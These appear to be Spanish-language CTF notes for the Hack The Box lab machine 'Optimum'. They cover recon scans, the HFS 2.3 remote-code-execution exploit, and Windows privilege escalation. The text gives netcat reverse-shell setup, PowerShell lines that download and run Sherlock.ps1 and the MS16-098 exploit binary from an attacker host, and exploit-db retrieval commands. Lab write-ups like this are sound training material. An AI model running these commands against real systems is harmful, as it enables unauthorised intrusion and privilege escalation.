echo "10.129.106.121 optimum.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.106.121 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210425131041.png

nmap -sC -sV -O -p- -oA optimum 10.129.106.121

nmap -sU -O -p- -oA optimum-udp 10.129.106.121

nikto -h 10.129.106.121:80

gobuster dir -k -u http://optimum.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Vemos que la version es HttpFileServer 2.3

https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands

Pasted image 20210425131545.png

searchsploit HFS 2.3
searchsploit -m 39161 windows/webapps/49125.py
vim 39161.py

Pasted image 20210425132003.png

Pasted image 20210425132143.png

locate nc.exe cp nc.exe /home/kali/Desktop/boxes

rlwrap nc -lvnp 1234

python3 -m http.server 8888

Pasted image 20210426192438.png

Cambiar la ip y el puerto. Despues donde dice ip_address agregar el puerto 8888

python2 39161.py 10.129.106.121 80

Lo tuve que hacer varias veces para que funcionara

Pasted image 20210426194422.png

https://github.com/rasta-mouse/Sherlock.git Bajar Sherlock y agregar Find All-Vulns al final.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.66:8888/Sherlock.ps1')

Conseguimos el exploit para MS16–098

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
   mkdir temp
   cd temp
	powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.66:8888/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Pasted image 20210426200946.png

boxes

copyright©2022 Cu3rv0x all rights reserved